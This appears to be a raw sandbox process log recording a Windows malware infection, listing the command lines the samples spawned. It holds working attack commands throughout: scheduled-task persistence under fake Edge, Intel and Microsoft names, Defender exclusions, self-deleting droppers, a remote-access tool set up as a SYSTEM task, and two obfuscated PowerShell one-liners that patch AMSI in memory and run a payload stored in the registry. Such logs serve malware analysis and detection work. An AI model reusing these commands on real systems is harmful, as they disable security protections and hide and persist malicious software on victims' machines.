schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\888.exe
"C:\Users\Admin\AppData\Local\Temp\a\888.exe"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Users\Admin\AppData\Local\Temp\a\50to.exe
"C:\Users\Admin\AppData\Local\Temp\a\50to.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CgQTGPodzTyw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZyEeawiuPnMRLX,[Parameter(Position=1)][Type]$wSfwjGIeCy)$ManiboOSoeP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+'ec'+[Char](116)+''+'e'+''+[Char](100)+'D'+[Char](101)+''+'l'+'e'+[Char](103)+''+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+'e'+''+[Char](109)+''+[Char](111)+''+'r'+'y'+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+'g'+''+[Char](97)+'te'+[Char](84)+''+[Char](121)+''+'p'+'e',''+'C'+''+'l'+''+[Char](97)+'ss'+','+''+'P'+''+[Char](117)+''+'b'+'lic'+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+','+'A'+''+[Char](110)+''+'s'+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$ManiboOSoeP.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+'d'+''+'e'+''+'B'+''+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZyEeawiuPnMRLX).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$ManiboOSoeP.DefineMethod(''+[Char](73)+'nv'+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+'N'+[Char](101)+''
+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$wSfwjGIeCy,$ZyEeawiuPnMRLX).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $ManiboOSoeP.CreateType();}$haNXAJHTYwclt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+'oso'+[Char](102)+''+[Char](116)+'.'+'W'+'in'+[Char](51)+''+[Char](50)+'.U'+[Char](110)+''+'s'+'a'+[Char](102)+''+'e'+''+'N'+''+'a'+''+'t'+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+'t'+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$NrGAxwwLFLqQyk=$haNXAJHTYwclt.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+'s'+'s',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+'St'+[Char](97)+'t'+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$kdSiEeEamrpeWmNNzBq=CgQTGPodzTyw @([String])([IntPtr]);$DPejLfzLLASsBslOMGwLeo=CgQTGPodzTyw 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WYKDbrTpXIs=$haNXAJHTYwclt.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+'o'+''+'d'+'ul'+[Char](101)+''+'H'+''+[Char](97)+'nd'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+'n'+'e'+[Char](108)+''+[Char](51)+''+'2'+'.'+[Char](100)+''+'l'+''+'l'+'')));$jrOgFUmnXPKbva=$NrGAxwwLFLqQyk.Invoke($Null,@([Object]$WYKDbrTpXIs,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'br'+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$ZwTtPthojZALcyERC=$NrGAxwwLFLqQyk.Invoke($Null,@([Object]$WYKDbrTpXIs,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+'t'+'e'+'c'+''+[Char](116)+'')));$SDmQSZZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jrOgFUmnXPKbva,$kdSiEeEamrpeWmNNzBq).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+'l'+[Char](108)+'');$QKqkiscBHXNBPBDjP=$NrGAxwwLFLqQyk.Invoke($Null,@([Object]$SDmQSZZ,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$wBiidsCSDH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZwTtPthojZALcyERC,$DPejLfzLLASsBslOMGwLeo).Invoke($QKqkiscBHXNBPBDjP,[uint32]8,4,[ref]$wBiidsCSDH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QKqkiscBHXNBPBDjP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZwTtPthojZALcyERC,$DPejLfzLLASsBslOMGwLeo).Invoke($QKqkiscBHXNBPBDjP,[uint32]8,0x20,[ref]$wBiidsCSDH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+'E').GetValue('r'+[Char](117)+''+'t'+''+[Char](115)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+''
)).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{fe9f5556-1e34-42c8-89ab-afa746c397ba}
C:\Windows\system32\lsass.exe
"C:\Windows\system32\lsass.exe"
C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im conhost.exe
C:\Users\Admin\AppData\Local\Temp\a\info.exe
"C:\Users\Admin\AppData\Local\Temp\a\info.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\regedit.exe
regedit /s "C:\Windows\SysWOW64\ruts\11.reg
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c delete.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Users\Admin\AppData\Local\Temp\a\50.exe
"C:\Users\Admin\AppData\Local\Temp\a\50.exe"
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Users\Admin\AppData\Local\Temp\a\SH.exe
"C:\Users\Admin\AppData\Local\Temp\a\SH.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:VtjvVificAJN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kusngmbREwjGSW,[Parameter(Position=1)][Type]$XKFbtELJBS)$NuEpGtSOYnb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+'t'+''+'e'+''+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+'mo'+[Char](114)+''+[Char](121)+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'t'+'e'+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+''+'a'+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+'i'+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+'t'+'o'+''+[Char](67)+'la'+[Char](115)+'s',[MulticastDelegate]);$NuEpGtSOYnb.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+'a'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+''+'y'+'S'+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$kusngmbREwjGSW).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+'M'+[Char](97)+''+'n'+''+[Char](97)+'ge'+'d'+'');$NuEpGtSOYnb.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char
](99)+','+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+'e'+''+[Char](119)+'S'+[Char](108)+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$XKFbtELJBS,$kusngmbREwjGSW).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+'d');Write-Output $NuEpGtSOYnb.CreateType();}$QUUJzFBntxEji=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+'m'+[Char](46)+'dl'+'l'+'')}).GetType(''+[Char](77)+'i'+'c'+''+'r'+'osof'+'t'+'.W'+'i'+'n32'+'.'+''+'U'+'ns'+[Char](97)+'feNa'+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+'h'+'o'+''+'d'+''+[Char](115)+'');$poHHlZzMgJrisA=$QUUJzFBntxEji.GetMethod('G'+'e'+''+'t'+''+[Char](80)+'r'+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ddbBMYDeVLMDspmiqfV=VtjvVificAJN @([String])([IntPtr]);$zNuQqnyONNTRQeuOxEpjTL=VtjvVificAJN 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SwUOmIepTyu=$QUUJzFBntxEji.GetMethod(''+'G'+'et'+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+'e'+'H'+'a'+'n'+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+'32'+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$ksSzcCsHSskmhO=$poHHlZzMgJrisA.Invoke($Null,@([Object]$SwUOmIepTyu,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+'i'+'b'+'ra'+[Char](114)+''+[Char](121)+''+'A'+'')));$XCULVGkXQfUkHqulO=$poHHlZzMgJrisA.Invoke($Null,@([Object]$SwUOmIepTyu,[Object](''+'V'+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+'a'+'l'+'P'+''+'r'+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$yIAjRrv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ksSzcCsHSskmhO,$ddbBMYDeVLMDspmiqfV).Invoke(''+'a'+''+'m'+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$lkSFLrDnoeSGJBDey=$poHHlZzMgJrisA.Invoke($Null,@([Object]$yIAjRrv,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$nAxVBtUsVE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XCULVGkXQfUkHqulO,$zNuQqnyONNTRQeuOxEpjTL).Invoke($lkSFLrDnoeSGJBDey,[uint32]8,4,[ref]$nAxVBtUsVE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$lkSFLrDnoeSGJBDey,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XCULVGkXQfUkHqulO,$zNuQqnyONNTRQeuOxEpjTL).Invoke($lkSFLrDnoeSGJBDey,[uint32]8,0x20,[ref]$nAxVBtUsVE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+'W'+''+'A'+''+'R'+'E').GetValue(''+[Char](114)+''+[Char](117)+''+[Char](116)+'s'+[Char](115)+''+[Char](116)+''+'a'+'ge'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
"C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
"C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Users\Admin\AppData\Local\Temp\a\qwex.exe
"C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Users\Admin\AppData\Local\Temp\a\XW.exe
"C:\Users\Admin\AppData\Local\Temp\a\XW.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 440 -p 5732 -ip 5732
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5732 -s 1512
C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"
C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
"C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"
C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
"C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"
C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"
C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
"C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 528 -p 1652 -ip 1652
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5608 -ip 5608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 884
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1652 -s 2132
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"
C:\Users\Admin\AppData\Local\Temp\rascqn.exe
"C:\Users\Admin\AppData\Local\Temp\rascqn.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4532 -ip 4532
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 1236
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe -run_agent -second
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5340 -ip 5340
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 564 -p 6548 -ip 6548
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6548 -s 388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 1308
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5292 -ip 5292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 1296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6212 -ip 6212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6212 -s 76
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 616 -p 7936 -ip 7936
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7936 -s 668
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
